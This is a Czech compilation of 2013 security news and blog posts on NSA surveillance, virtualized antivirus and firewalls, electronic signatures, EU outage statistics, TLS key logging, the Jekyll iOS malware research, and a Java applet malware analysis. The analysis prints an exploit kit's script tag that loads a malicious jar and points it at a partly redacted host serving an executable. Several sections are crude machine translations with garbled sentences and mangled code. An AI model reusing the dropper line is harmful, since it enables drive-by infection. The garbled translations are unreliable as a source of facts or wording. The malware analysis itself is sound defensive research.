Nelze příliš věřit ani argumentům, že původci většiny útoků jsou „ti dobří“, kteří jednají pouze v rámci své vlastní filosofie a představy o rozvoje společnosti (parafráze aurgumentů, které použil Manningův právník). Stačí vzít v úvahu poslední právy ze světa velkých úniků dat – například útok malwaru na uživatele herní služby Steam. Ovládnuty byly severoamerické servery hry League of Legends a útočníci získali údaje o více než 120 000 kreditních karet.
Realitou je, že žádný základní protokolu internetu není bezpečný. Stojí za to naslouchat zakladateli – nyní již zrušené – služby bezpečného e-mailu Lavabit, že e-mail je mnohem méně bezpečný, než všichni uživatelé podvědomě věří (či chtějí věřit). Na úrovni operačních systému to není o nic lepší a všechny vlády jsou velmi skeptické i v otázce vlastního soukromí.
Konkrétně ta německá se obává, že technologie TPM (Trusted Platform Module) je jedním obrovským informačním tunelem přímo na stoly NSA. TPM je součástí řady nových stolních počítačů, tabletů a především korporátních notebooků, zprávy naznačují, že zatímco ve Windows 7 lze tomuto řešení věřit, TPM 2.0 ve Windows 8 již není bezpečné a Microsoft do něj připravil NSA široce otevřené dveře.
Tomu všemu odpovídá aktivita výrobců nejrůznějších bezpečnostních řešení, kteří budou v následujícím roce nepochybně vykazovat působivé zisky. Je samozřejmě otázkou, do jaké míry mohou své zákazníky chránit nejen před „zlými čínskými hackery“, ale i před odděleními cizích vlád s prakticky neomezenými prostředky.
Ochrana virtualizovaných sítí vyžaduje změny
Virtualizace má obrovský vliv, což vyvolává i otázky o úloze fyzických zabezpečovacích zařízení ve virtuálním světě. Podle Gartneru do roku 2015 budou zhruba 40 % bezpečnostních kontrol v podnikových datových centrech budou dělat virtualizované systémy – v roce 2010 to přitom bylo jen 5 %.
Zabezpečení
Nedávno poskytl analytik Gartneru Neil MacDonald, jenž se zaměřuje právě na otázky zabezpečení a je mimo jiné obhájcem změn při vývoji základních síťových technologií, rozhovor pro IDG. V něm se zamýšlel nad budoucností ochrany dat ve virtualizovaném prostředí.
Aby se těmto prostředím dodavatelé bezpečnostních produktů přizpůsobili , někteří z nich — přicházejí se softwarovými řešeními, o kterých prohlašují, že jsou optimalizované pro specifická prostředí jako například VMware.
Bylo však překvapivé, že si představitelé společnosti McAfee při ohlašování jejího nejnovějšího softwaru MOVE (Management for Optimized Virtual Environments) Antivirus 2.5 stěžovali, že přístup bez agentů není úplně vhodný.
Přitom jejich nový produkt podporuje ochrannou technologii VMware vShield, která ale řešení bez agentů vyžaduje.
Podle specialistů McAfee by bylo vhodné, kdyby VMware v případě vShieldu své názory na řešení bez agentů změnil. Zmínění experti dokonce tvrdí, že lepším řešením by bylo použití agentských systémů. Zdá se, že v této oblasti zabezpečení dat v současnosti panuje určité napětí. O co tedy vlastně jde?
S agenty, či bez nich? Představitelé McAfee tvrdí, že bezagentový přístup není tak dobré řešení jako spouštění těchto softwarových modulů uvnitř virtuálního stroje (VM). A něco pravdy na tom zřejmě je.
Ochrana proti přetečení bufferu a ochrana paměti – všechny tyto záležitost probíhající uvnitř VM nelze bez agenta zvládnout.
Není totiž k dispozici žádná behaviorální heuristika. Je možné otevřít soubor a zavřít soubor. Pomocí produktu MOVE 2.5 ale McAfee přidává i zpracování bez agentů. Samo McAfee pitom podporuje obě řešení – s agenty i bez agentů – a je vůči hypervizoru neutrální.
Jaký je tedy problém ohledně používání antivirového softwaru s agenty ve virtuálních strojích? Říká se tomu „A/V bouře“ a vytváří to další datové přenosy. Předpokládejme, že je vše nastaveno ke spuštění v poledne. Jako správce můžete řekněme nastavit spouštění „náhodně mezi 12. a 14. hodinou.“
Je to sice řešení, ale není zdaleka nejlepší. Proč opakovat skenování stejné bitové kopie? Rozhraní API VMwaru vám umožní skenovat jen jednou. Kaspersky to podporuje, ale Symantec zatím ne – jejich Symantec Endpoint Protection 12 používá jinou architekturu.
Práce VMwaru s bezpečnostními rozhraními vShield API se v průběhu let ukazuje jako poněkud diskutabilní. Vypadá to, jako by VMware měl zájem spolupracovat pouze s konkrétními dodavateli zabezpečení.
VMware vytvořil první sadu rozhraní API na vlastní pěst, aniž by to s dodavateli bezpečnostních produktů nějak komplexně řešil. Spolupracoval však úzce s firmou Trend Micro.
Výsledný model vzniklý jejich kooperací je inovativní a pro prvně jmenovanou firmu to dopadlo dobře — uzavřela spoustu dohod.
Rozhraní API navržená od zeleného stolu obvykle nefungují úplně dobře. Díky zaměření na několik dodavatelů VMware dosáhl většího úspěchu.
Existují výhody i nevýhody výše popisovaného přístupu bez agenta. Mezi pozitiva patří to, že se objevila off-line ochrana VM s lepším využitím zdrojů. Nevýhodou je ale potřeba rozšíření hypervizoru, je to řešení vhodné jen pro VMware, je nezbytné vlastnit příslušné licence, funguje to jen pro Windows, není to zcela „bez agenta“ a k dispozici je jen skenování proti malwaru.
Virtualizované firewally Rozhraní vShield API zajišťuje VMwaru schopnosti obvyklé u firewallu. V současné době podniky používají oddělené síťové rozhraní pro každou zátěž. Důvěřujete VMwaru v oblasti separace paměti, ale síťové přenosy ale přece jen raději zasíláte odděleně na fyzické firewally.
Je proto dalším logickým krokem virtualizace firewallu? Ten od VMwaru by to mohl dokázat. Základní segmentaci zvládá dobře.
Firmy Check Point, Juniper a Cisco už mají avé virtuální firewally. Firewall Check Pointu umí funkci IPS, kterou VMware nemá. Ten ale pro tuto funkcionalitu využívá partnerství s třetími stranami.
Ve virtualizaci to všechno znamená vzít kontrolu zabezpečení a vtáhnout ji dovnitř. Otázkou je, kdo je za to odpovědný. Musíte udržovat rozdělení povinností.
VMware má přístup na základě rolí, který k tomu lze použít. Stejně tak třeba řešení od firmy HyTrust.
Nemusíme nutně chtít, aby se o všechno starala jedna osoba – síťový firewall může mít na starost správce zabezpečení a zbytek administrátor VMwaru.
Ale budoucnost je hybridní – některé firewally budou virtuální a jiné hardwarové. Například firmu Palo Alto Networks znevýhodňuje, že hojně využívá proprietární hardware. Firewall této firmy v současné době není virtualizovaný, ale jednou, jak potvrzují její představitelé, bude.
Elektronický podpis a jeho platnost v čase
Co se děje s elektronickými podpisy, jak ubíhá čas? Stávají se po určité době neplatnými? Nebo se jejich platnost v čase nijak nemění – a mění se pouze naše schopnost tuto platnost ověřit? Tedy zjistit a prokázat?
Zabezpečení
Otázka v podtitulku dnešního dílu reaguje na zřejmě nejčastější omyl kolem elektronických podpisů a jejich platnosti. Tím je představa, že platnost elektronických podpisů je nějak časově omezena a že se tyto podpisy po určité době stávají neplatnými. To ale není pravda.
Skutečnost je taková, že právní řád nezná nic jako „podpis na dobu určitou“. Tedy takový, jehož platnost by byla nějak apriorně omezena, tak aby platil jen po nějakou konkrétní dobu a pak už nikoli. Nemůžete tvrdit něco jako: „tento podpis byl ještě minulý týden mým podpisem, ale dnes už mým podpisem není.“ Jakmile jste se jednou platně podepsali, je to „napořád“ a už to nikdy nezměníte. A to platí pro všechny druhy podpisů bez rozdílu. Tedy jak pro vlastnoruční na „papírových“ dokumentech, tak i pro elektronické na elektronických dokumentech.
Nepleťme si to ale s právními úkony, které svým podpisem stvrzujete. Ty samozřejmě již mohou být různě časově omezeny a mohou být i odvolávány, resp. „brány zpět“. Ale ne samotné podpisy. Chcete-li třeba vzít zpět nějaký právní úkon, který jste učinili a stvrdili svým podpisem, musíte učinit nový právní úkon (o zpětvzetí) a ten také stvrdit dalším svým podpisem.
O co přicházíme s tokem času? Jinou věcí je ale to, zda jsme či nejsme schopni ověřit platnost nějakého konkrétního podpisu. Tedy nejenom zjistit, zda je či není platný, ale také toto své zjištění prokázat někomu, kdo o něm nebude přesvědčen či o něm bude přímo pochybovat. To už je věc, která se v čase mění.
V případě vlastnoručních podpisů (na „papírových“ dokumentech) se mění proti naší vůli tím, jak inkoust bledne, papír se rozpadává atd. Tedy v důsledku „samovolných“ dějů, kterým můžeme kontrovat vhodnými metodami péče o samotné dokumenty, jejich konzervací atd. Rozhodně to ale není tak, že by u vlastnoručních podpisů někdo programově říkal: chci, aby po době XY již nebylo možné jejich platnost ověřit.
U elektronických dokumentů je ale situace diametrálně odlišná. Zde je naopak vše zařízeno tak, aby se po jisté době jejich platnost nedala ověřit. Tedy pokud v mezidobí – přesněji před koncem řádné doby platnosti podpisového certifikátu – nejsou provedena vhodná opatření, která možnost ověření prodlouží. Protože jinak možnost ověření končí právě okamžikem, kdy končí řádná doba platnosti certifikátu, na kterém je podpis založen.
Časová razítka jako ochrana proti kolizním dokumentům Důvod, kvůli kterému je možnost ověření platnosti elektronických podpisů omezována v čase, je velmi racionální. Jde o strach z toho, že by ke konkrétnímu podepsanému dokumentu někdo dokázal najít (přesněji vypočítat) tzv. kolizní dokument. Tedy dokument, který je sice jiný co do svého obsahu, ale má stejný otisk (tzv. hash), a tím i tentýž elektronický podpis. Protože pak by bylo možné vzít samotný podpis z původního dokumentu, připojit jej ke koliznímu dokumentu a ten vydávat za původně podepsaný dokument. A ono by to prošlo, protože podpis na kolizním dokumentu by „seděl“ – a může tedy být ověřen jako platný.
Opatřením, kterým lze kontrovat hrozbě „podstrčení“ kolizního dokumentu, je přidání časového razítka. To si můžeme představit jako určitý trezor, do kterého je elektronicky podepsaný dokument uzavřen, tak aby „vydržel“ odolávat kolizním dokumentům o něco déle. Díky tomu je také možné prodloužit dobu, po kterou se dá platnost podpisu ověřit (díky jistotě, že v mezidobí nebyl původní dokument nahrazen kolizním dokumentem). Nikoli ale navěky, a proto je i účinek časového razítka časově omezený, typicky na několik málo let – a než skončí, je třeba přidat další časové razítko. Tedy vlastně zavřít podepsaný dokument i s prvním razítkem do dalšího, ještě silnějšího trezoru. A tak dále: vždy, než skončí možnost ověření daná posledně přidaným časovým razítkem, je nutné přidat další časové razítko.
Jinými slovy o své elektronické dokumenty se musíme aktivně starat přidáváním časových razítek. Nemůžeme je nechat jen tak někde ležet v šuplíku.
Posuzovaný časový okamžik Časové razítko, přesněji to kvalifikované, ale plní ještě jeden velmi důležitý úkol. Umožňuje nám ověřovat platnost podpisu „co nejblíže“ době jeho vzniku.
To je důležité pro posuzování podmínek nutných pro platnost elektronického podpisu. Tedy pro volbu tzv. posuzovaného okamžiku. Jde například o platnost certifikátu a jeho eventuální zneplatnění. Potřebujeme vědět, zda k posuzovanému okamžiku podpisu byl certifikát ještě platný (ve smyslu řádné doby své platnosti) a zda nebyl k tomuto okamžiku zneplatněný (revokovaný).
V praxi ale okamžik vzniku podpisu neznáme dostatečně spolehlivě na to, abychom se na něj mohli spoléhat. Proto splnění příslušných podmínek posuzujeme alespoň k nejstaršímu okamžiku, ke kterému máme jistotu, že podpis již existoval. A tuto jistotu nám dává právě (kvalifikované) časové razítko. Případně to nejstarší, pokud jich je více a pokud jsme schopni ověřit jeho platnost. Posuzovaným okamžikem je pak čas uvedený v nejstarším (kvalifikovaném) časovém razítku.
V opačném případě, pokud elektronický podpis není opatřen žádným časovým razítkem, nemáme žádné vodítko ohledně toho, kdy podpis již existoval, a splnění podmínek jeho platnosti proto musíme hodnotit k aktuálnímu časovému okamžiku. Posuzovaný okamžik tedy musíme nastavit na aktuální časový okamžik, ve kterém provádíme samotné ověření. Pak ale často narazíme na to, že podpisový certifikát v mezidobí již expiroval. Tedy že k aktuálnímu časovému okamžiku již skončila řádná doba jeho platnosti. Pak ale celé ověřování musí skončit neúspěchem – konstatováním, že platnost podpisu již není možné ověřit, a že o ní tudíž nic nevíme.
NSA monitorovací systém lze poslouchat až 75% provozu internetové společnosti US
22. srpna 2013. Špionáž
Další den, další sada odhalení o možnostech NSA internetových dozoru a postupy. Současná a bývalá vládní úředníci (předvídatelně) nechce být jmenován, že sdílet s novináři WSJ, že zatímco NSA není ze zákona dovoleno špehovat, co USA občané dělají online, agentura je síť epidemiologického dozoru, je schopen dosáhnout a řádí nějaký 75 procent provozu internetového USA při vyhledávání cizí inteligence. Tato síť byla vytvořena s pomocí společnosti velkých amerických telekomunikačních, která umožnila zřízení filtrování stanice na více než tucet míst na hlavních internetových uzlů v USA. Podle zdrojů, telekomunikační sami zvolit, které proudy internetového provozu je více pravděpodobné, že obsahuje cizí inteligenci, a poslat je do NSA. Pak agentura jde přes ně a dělá užší výběr těch potoků, které se domnívají, že jsou slibné, a to jak při pohledu na metadata a na skutečný obsah sdělení. To by nemělo přijít jako hodně překvapení pro každého, kdo si pamatuje zjevení Mark Klein, telekomunikační technik a bývalým AT & T pracovníka, který tvrdil, že v roce 2006 byla společnost umožňuje NSA shromažďovat obrovské množství dat o zákaznících bez povolení. Jeho požadavky byly také potvrzeny dokumenty unikly informátorů NSA Edward Snowdena. Takže, co je zde aktuální novinky? Že navzdory technikami "minimalizaci" NSA je schopen shromáždit a prostudovat americký internetový provoz? Ne, to se někdy snaží dělat jen to, a že některé z telekomunikací se občas snaží omezovat přístup pouze "cizí" jasně proudy dat? Ne to, že americká vláda je neustále relaxační standardy, jaké údaje může a nemůže být shromažďovány. "NSA zahraniční aktivity shromažďování informací jsou neustále kontrolovány a sledovány interně i externě," říká mluvčí NSA Vanee Vines říká. "Když uděláme chybu při provádění své zahraniční zpravodajské poslání, my nahlásit problém interně a federálních orgánů dozoru a agresivně dostat na kloub." Ale nejmenované úředníci říkají, že neúmyslný omyl byl vyroben v roce 2008, kdy soubor NSA filtry na těchto programech, které monitorují provoz na internetu, nevhodné filtrování bylo "odhalili" a oznámeny až v roce 2011. "Věř nám a našim dozorců," říká americká vláda svým občanům, a pak opakovaně a neustále efekty porušení soukromí, které jsou vždy "chyby ", a vždy" neúmyslné "nebo" náhodný ". Konečně, jsou tyto "chyby", obvykle zametl pod koberec a NSA reklamace nemohou být nezávisle ověřeny FISC. Jediný bod vyplatí v tom všem je, že doufám, že kumulativní hmotnost všech těchto zjevení se nakonec jet domů: že navzdory tomu, co vláda říká, že tyto kontrolní úsilí zjevně není pod dohledem, jak by měly být, a že pro mnoho let jejich existence byla držena od někoho, kdo by mohl protestovat a mají vliv něco udělat, bránit je.
Za rozsáhlými výpadky v EU obvykle stojí kyberútoky
Nejhorší vliv na kvalitu internetového připojení v členských zemích Evropské unie mají kybernetické útoky.
KyberWar
Ačkoliv měly kybernetické útoky v loňském roce na svědomí asi jen 6 % všech výpadků veřejných elektronických komunikačních sítí a služeb v Evropské unii, na zhoršenou konektivitu uživatelů měly podstatně větší vliv než hardwarové poruchy, které jsou přitom častější příčinou internetových výpadků.
S informací přišla Evropská agentura pro bezpečnost sítí a informací (ENISA). Podle ní stály hardwarové poruchy v roce 2012 asi za 38 % všech výpadků internetového připojení na území EU a nějakým způsobem se průměrně dotkly přes 1,4 miliónu uživatelů. Kybernetické útoky i přes menší podíl na samotných výpadcích narušily komfort v průměru asi 1,8 miliónu lidí.
Primárním cílem kyberútoků bylo narušení internetového připojení. Konkrétně byly druhou nejčastější příčinou výpadku pevného internetového připojení (20 %) a v menší míře narušily také mobilní internetové služby (13%).
ENISA ve své zprávě vychází z analýzy 79 incidentů, které se v loňském roce staly v 18 členských státech Evropské unie a které vedly k vážným výpadkům telefonních a internetových služeb. Pouze 9 členských zemí nezaznamenalo žádný výpadek a 1 země zatím nepodala hlášení.
Agentura rozdělila incidenty do pěti kategorií podle jejich příčin. Kromě selhání systému či třetí strany ENISA rozlišuje také lidské chyby, přírodní jevy a úmyslné jednání. Nejčastější příčinou (79 %) byla systémová chyba. Selhání třetí strany stálo za 13 % incidentů, úmyslné jednání za 8 %, přírodní jevy za 6 % a lidské chyby za 5 %. Některé incidenty se přitom dostaly i do více než jedné kategorie.
Poruchy způsobené přírodními jevy: bouřemi, záplavami, vánicemi či zemětřesením, a lidskou chybou vyústily ve vůbec nejdelší výpadky. Jeden takový výpadek trval v průměru 36, respektive 26 hodin. Na druhou stranu však oba typy výpadků postihly malé množství uživatelů – v průměru 557 a 447 tisíc.
Úmyslné jednání naproti tomu postihlo přes 1,5 miliónu uživatelů, ačkoliv v průměru takový výpadek trval 4 hodiny. Co do počtu postižených uživatelů však „zvítězily“ výpadky způsobené přetížením, které se průměrně dotkly asi 9,4 miliónu lidí. Kyberútoky, jak již bylo řečeno, odstřihly od internetu v průměru přes 1,8 miliónu uživatelů. Asi nikoho nepřekvapí, že šlo obvykle o útoky typu DDoS.
Psst. Váš prohlížeč Zná všechna vaše tajemství. 21.8.2013 Bezpečnost
Toto je "guest deník" vložila Sally Vandeven. Rádi vám předá všechny odezvy nebo využijte náš komentář / forum sekci komentovat veřejně. Sally je v současné době zapsáni v SANS magisterský program .
Musím se zeptat, jeden den, jak těžké by bylo najít šifrovací klíče používané mým prohlížečem a webovým serverem pro relace TLS. Myslel jsem, že by vyžadoval výpis paměti volatility, pokusů a omylů a možná trochu štěstí. Tak jsem se začal rozhlížet, a tak jako mnoho věcí v životě .... vše, co musíte udělat, je požádat. Opravdu. Zeptejte se vašeho prohlížeče, aby vám tajemství a bude! Jako třešničku na dortu bude Wireshark číst těmito údaji tajemství a dešifrování pro vás. Zde je rychlý přehled kroků:
Nastavit proměnnou prostředí s názvem SSLKEYLOGFILE, která odkazuje na zapisovatelný bytu textového souboru. Oba Firefox a Chrome (relativně aktuální verze) se podívá na proměnnou, když se spustí. Pokud existuje, bude prohlížeč zapisovat hodnoty použité pro generování klíče relace TLS se do tohoto souboru.
Vstup Client_Random je Diffie-Hellman pro jednání zasedání a RSA údaj je pro sezení pomocí RSA nebo DSA klíče výměnu. Máte-li zachycený TLS šifrování síťový provoz, tyto poskytují chybějící kusy potřebné pro dešifrování. Wireshark je postarat se o to pro vás. Opět platí, že vše, co musíte udělat, je požádat.
Wireshark SSL Session
To je šifrovaná TLS relace, ještě předtím, než Wireshark tajemství.
Zaměřte Wireshark na souboru $ SSLKEYLOGFILE. Zvolte Upravit -> Nastavení -> Protocols -> SSL a potom na tlačítko OK.
Wireshark SSL konfigurace
Chcete-li zobrazit dešifrovaná dat, použijte filtr zobrazení "SSL && http". Chcete-li se podívat na konkrétní relaci protokolu TCP, klepněte pravým tlačítkem myši na některou položku a zvolte "Follow SSL Stream". To ve skutečnosti znamená: "Pojď dešifrovaném SSL Stream". Všimněte si novou kartu v dolní části označené "dešifrovat SSL údaje". Mimochodem, pokud jste "Follow TCP Stream", získáte šifrované TCP stream.
Wireshark dešifrovat zasedání
Wireshark je úžasné dešifrování funkce.
Níže je ukázka dešifrovaném SSL Stream. Obsahuje pokus o přihlášení s uživatelským jménem a heslem, nějaké sušenky a další dobroty, které webové servery a prohlížeče často vyměňovat.
Reassembled SSL Sesion
Nezapomeňte: pokud máte soubor s klíči v ní a zachycených dat na vašem systému pak někdo, že můžete dostat své ruce na nich mohou dešifrovat taky. Ahoj, pokud jste pero tester můžete vyzkoušet nastavení být na pozoru $ SSLKEYLOG proměnné na vašich cílů. Zajímavý.
Zkus to, ale jako vždy, získat písemný souhlas od sebe, než začnete. Díky za čtení.
Schvalovacím procesem App Store může projít malware
Tým výzkumníků z Georgijského technického institutu odhalil způsob, jak schvalovacím procesem aplikací pro Apple App Store propašovat malware.
Viry | Zabezpečení
Svůj výzkum pojmenovali „Jekyll apps“ a představili ho na 22. bezpečnostím symposiu USENIX v americkém hlavním městě. Zprávu také zveřejnili online jako PDF s názvem Jekyll na iOS: Když se neškodná aplikace stane zlou (Jekyll on iOS: When Benign Apps Become Evil).
„Naše metoda útočníkům umožňuje spolehlivě ukrýt zákeřné chování, které by jinak způsobilo zamítnutí aplikace během vstupního procesu,“ vysvětlil pětičlenný tým.
„Klíčovou myšlenkou je vytvořit aplikaci tak, aby se dala zneužít na dálku, změnit kód a dodatečně představit zákeřné řídící toky. Vzhledem k tomu, že nové řídící toky během schvalovacího procesu neexistují, mohou takové aplikace od Applu jednoduše získat schválení k distribuci pomocí App Store. Naši pokusnou aplikaci Jekyll jsme úspěšně zveřejnili na App Store a poté jsme na kontrolované skupině zařízení vzdáleně spustili útok. Výsledky ukazují, že nehledě na to, že byla aplikace uvnitř iOS sandboxu, mohla úspěšně provést mnoho zákeřných útoků – tajně rozesílat tweety, fotit, krást identifikační údaje nebo dokonce zneužít zranitelnosti jádra systému.“
Výzkumníci použili soukromé API, aby mohli zpřístupnit data uživatelů, třeba obsah jejich adresáře.
Jekyll byl založen na zpravodajské open source aplikaci News:yc, kterou výzkumníci doplnili o zranitelnosti a zákeřný kód a nastavili ji k připojení na jimi kontrolovaný server. Apple aplikaci schválil a vydal v březnu 2013 na dost dlouho, aby ji tým mohl stáhnout na svá vlastní zařízení. Poté ji rychle výzkumníci z obchodu stáhli, aby ji nenainstaloval někdo jiný.
Tom Neumayr, mluvčí Applu, řekl, že Apple na zprávu již reagoval a provedl potřebné změny. Aktualizace obsahující bezpečnostní vylepšení vydal Apple již v půlce března, tvůrci Jekylla však pochybují o tom, že by to bylo v reakci na jejich zneužití.
Takto škodlivé aplikace by podle nich nebylo možné rozpoznat bez důkladného prozkoumání zdrojového kódu.
Podle výzkumníků Applu zabralo pouze pár vteřin, než aplikaci zkontroloval a schválil k distribuci přes svůj obchod s aplikacemi. To vyvolává otázku, jaký jiný malware by se do App Storu mohl dostat, nebo jaký tam již je.
Apple oznámil, jak aplikace testuje. Standardní metodou by bylo spustit strojovou „dynamickou analýzu,“ při které je kód spuštěn ve virtuálním zařízení a zkontrolován.
Konkurenční Android čelí problémům s malwarem v Google Play celkem často, podle bezpečností společnosti Trend Micro bude na Androidu do konce roku k dostání milion zákeřných aplikací.
Novinka, že ani Apple není úplně neomylný při schvalovacím procesu, může podpořit hackery, aby se na tento OS zaměřili více, společnost tak bude muset svou bezpečnost vylepšit.
Anti-dekompilace techniky v škodlivým aplety Java
Hacking | Zranitelnosti
Krok 1: Jak to začalo Když jsem vyšetřoval případ Trojan.JS.Iframe.aeq (viz blogpost <http://www.securelist.com/en/blog?weblogid=9151>) jeden ze souborů klesl o Exploit Kit byl Applet využití Zranitelnost:
<script> document.write('<applet archive="dyJhixy.jar" code="QPAfQoaG.ZqnpOsRRk"><param value="http://fast_DELETED_er14.biz/zHvFxj0QRZA/04az-G112lI05m_AF0Y_C5s0Ip-Vk05REX_0AOq_e0skJ/A0tqO-Z0hT_el0iDbi0-4pxr17_11r_09ERI_131_WO0p-MFJ0uk-XF0_IOWI07_Xsj_0ZZ/8j0A/qql0alP/C0o-lKs05qy/H0-nw-Q108K_l70OC-5j150SU_00q-RL0vNSy/0kfAS0X/rmt0N/KOE0/zxE/W0St-ug0vF8-W0xcNf0-FwMd/0KFCi0MC-Ot0z1_kP/0wm470E/y2H0nlwb14-oS8-17jOB0_p2TQ0/eA3-o0NOiJ/0kWpL0LwBo0-sCO_q0El_GQ/roFEKrLR7b.exe?nYiiC38a=8Hx5S" name="kYtNtcpnx"/></applet>'); </script> Krok 2: První analýza Takže v podstatě jsem rozepnul. Nádobu a se podívat pomocí JD-GUI, dekompilaci java. Jednalo se o výsledné třídy uvnitř jar soubor.:
Názvy tříd jsou divní, ale nic neobvyklého. Obvykle Manifest uvádí vstupní bod (hlavní třída), v appletu. V tomto případě nedošlo k žádnému zjevnému, ale my jsme mohli vidět v appletu volání z HTML:
< applet Archiv = "dyJhixy.jar" code = "QPAfQoaG.ZqnpOsRRk" > << balíček a třída vykonat < param hodnota = "http://
Třetí parametr byl. Exe, že applet klesá. Nebylo skutečná potřeba prozkoumat některou hlouběji jen proto, aby získali přehled o tom, co dělá applet. Nicméně bod, zde bylo analyzovat chybu, která toto. Jar využije.
Na tomto místě bych měl říci, že jsem zaujatý. Četl jsem zprávu McAfee o podobné kampaně s použitím stejného Exploit soupravy. V této zprávě se říká, že malware se snížily o tomto HTML uvnitř byla stavebnice CVE-2013 - 0422.
Obvykle je první vodítko, které by mohly potvrdit, to by bylo verdikty z AV dodavatelů, ale tentokrát to nebyl případ:
Ok, takže se pojďme podívat na rozklad kódu, počínaje vstupním bodu. Můžeme potvrdit, že třída ZqnpOsRRk provádí applet:
Balíček QPAfQoaG; import java.applet.Applet; import java.lang.reflect.Constructor; import java.lang.reflect.Method; public class ZqnpOsRRk rozšiřuje aplet Ale rychle vidíme, že něco nefunguje. Jména tříd a metod, které jako náhodné řetězce popletl, ale to je čeho se bát. V tomto případě však vidíme, že decompiler ukazuje podivnou "kód":
veřejné ZqnpOsRRk () { (-0.0D); návrat; 1L; 2; 1;} Nebo to není schopen dekompilovat metody třídy přímo a je jen ukazovat jako bytecode komentářů:
public void ttiRsuN () hodí Throwable { / / Byte kód: / / 0: 10 ldc_w / / 3: iconst_4 / / 4: ineg / / 5: iconst_5 / / 6: ineg / / 7: POP2 / / 8: lconst_0 / / 9: POP2 Teď jsem začal přemýšlet, jak špatná je situace? Mohl bych ještě dostat dostatek informací, zjistit, které CVE je využíván tímto. Sklenice?
Čas na nějaké vážné kopání!
Začal jsem se přejmenovat tříd na základě jejich prvních písmen (ZqnpOsRRk do Z, CvSnABr na C, atd.) a aby odpovídaly metody s tím, co jsem si myslel, že dělají. Je to podobně jako jakýkoli RE pomocí IDA.
Tam byla spousta "divné" kódu kolem, který dostal podivné výklady z Decompiler. Rozhodl jsem se odstranit ji uklidit úkolu.
Samozřejmě, že existuje riziko, že bych mohl smazat něco důležitého, ale tentokrát to vypadalo jako mylné interpretaci bytecode, mrtvého kódu a nepoužitých proměnných. Tak jsem odstranil věci jako:
public static String JEeOqvmFU (třída arg0) { (-5), (-2.0F) return 1;} takhle Tam, kde jsem viděl komentoval bytecode (ne rozložit JD-GUI), smazal jsem všechno, ale odkazy na funkce / třídy.
Na konci jsem měl mnohem čistší kód, ale byl jsem velmi znepokojen, že bych mohl chybět důležité části. Například jsem měl postupů, které se právě vrátil NULL, funkce, která jen deklarované proměnné, nepoužité proměnné, atd.
Kolik z toho, jestliže některý, byl součástí expolit a kolik bylo jen špatně vykládáno kód?
Alespoň jsem byl schopný dostat něco užitečného po vyčištění kódu. Byl jsem schopen lokalizovat funkce slouží k deobfuscate řetězce:
public static String nwlavzoh (String mbccvkha) { byte [] = arrayOfByte1 mbccvkha.getBytes (); byte [] = new byte arrayOfByte2 [arrayOfByte1.length]; for (int i = 0; i <arrayOfByte1.length, i + +) arrayOfByte2 [i] = ((byte) (arrayOfByte1 [i] ^ 0x44)); return new String (arrayOfByte2); } Ne tak docela věda. Teď jsem mohl překládat všechny řetězce, ale já jsem ještě neměl jasnou představu o tom, co se děje v tomto. Sklenice.
Krok 2: Různé strategie Vidět, že kód nebyl správně rozložit jsem si vzpomněl, že zjistit, které zranitelnost je využívána nemáte opravdu potřebují plně předmětem rozkladu kód. Nalezení správné stopy lze odkázat vás na správnou exploitu. Na tomto místě bych si myslel, že by to mohlo být CVE-2013-0422, tak jsem se rozhodl získat další informace o této chybě, a uvidíme, jestli bych mohl najít něco v kódu potvrdit.
Tento CVE byl objeven v lednu 2013. Oracle měl špatný čas jen tehdy, a krátce nato několik dalších Java chyby byly vystaveny.
Stáhnul jsem si několik ukázek z VirusTotal s tímto CVE. Všichni byli snadno rozložit a viděl jsem několik způsobů, jak implementovat tuto chybu zabezpečení. Ale tam byl žádná velká stopa.
Rozhodla jsem se také vyzkoušet několik dalších dekompilátory, ale pořád ještě žádné výsledky.
Nicméně, když se vezme druhý pohled na výsledky běží dnes zastaralé JAD jsem viděl, že dekompilován kód byl docela odlišný od jednoho z JD-GUI, i když to bylo stále neúplné a nečitelné.
Ale byly tam různé hovory s popletl strun deobfuscation funkce.
Applet používá zavaděčem tříd s popletl řetězce, aby se zabránilo odhalení, takže je obtížné vědět, co je nakládání bez správně rozložit řetězce. Ale teď jsem měl všechny z nich!
Po spuštění skriptu jsem:
com.sun.jmx.mbeanserver.JmxMBeanServer newMBeanServer javax.management.MbeanServerDelegateboolean getMBeanInstantiator findClass sun.org.mozilla.javascript.internal.Context com.sun.jmx.mbeanserver.Introspector createClassLoader Teď to bylo mnohem jasnější a dobře znám. Měl jsem jiný pohled na jeden z PDF Zrovna jsem četl a bingo!
https://partners.immunityinc.com/idocs/Java% 20MBeanInstantiator.findClass%% 200 dnů 20Analysis.pdf
Tak konečně jsem mohl potvrdit CVE skutečně CVE-2013-0422.
Krok 3: Proč ne Java Decompiler práci? V těchto případech je vždy možné přijmout jiný přístup a udělat nějaké dynamickou analýzu ladění kódu. Pokud chcete jít touto cestou doporučuji přečtení pro nastavení:
Nicméně, nemohl jsem přestat přemýšlet o tom, proč jsou všechny dekompilátory nepodařilo s tímto kódem. Pojďme se podívat na rozklad bytecode ručně. Můžeme snadno dostat to takhle:
veřejnosti . QPAfQoaG ZqnpOsRRk ( ) , kód : 0 : aload_0 1 : invokespecial # 1 ; / / Metoda java / applet / applet "<init>.": () V 4 : dconst_0 << tlak
a dekompilován kód s příslušnými návody čísel:
public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { ( - 0.0D ) ; návrat ; 1L ; 2 ; 1 ; }
Tak můžeme vidět, jak metoda, která právě zajišťuje návratnost ponechává hodně smetí ve středu. Decompiler nemůže zvládnout a snaží se interpretovat všechny tyto operace, tyto anti-rozkladu artefakty. To jen přidává spoustu extra hluku do konečných výsledků. Můžeme bezpečně odstranit všechno.
public class ZqnpOsRRk rozšiřuje Applet { public ZqnpOsRRk ( ) { return ; }
Existují tuny těchto artefaktů v bytecode. Zde je několik příkladů:
1: lconst_0 2: lneg 3: pop2 1: iconst_5 2: ineg 3: iconst_1 4: ineg 5: pop2 1: iconst_5 2: ineg 3: iconst_5 4: swap 5: pop2 Existuje také spousta nesmyslných skoky, jako je Push NULL pak skočit pokud GOTOS NULL a NOP.
V podstatě je to těžké odstranit tyto konstruktory od bytecode, protože parametry jsou odlišné a ne vždy hodit do stejné opcodes. Je to až k Decompiler, jak se zbavit tohoto mrtvého kódu.
Po několika hodinách Ruční čištění kódu a rekonstruovat z bytekódu mohl jsem konečně přečetl výsledek a porovnat jej s původním rozklad jednoho. Teď jsem pochopil, co se děje a co se stalo s původním kódem jsem mohl bezpečně odstranit mrtvé kód a zavést čitelné názvy tříd a metod.
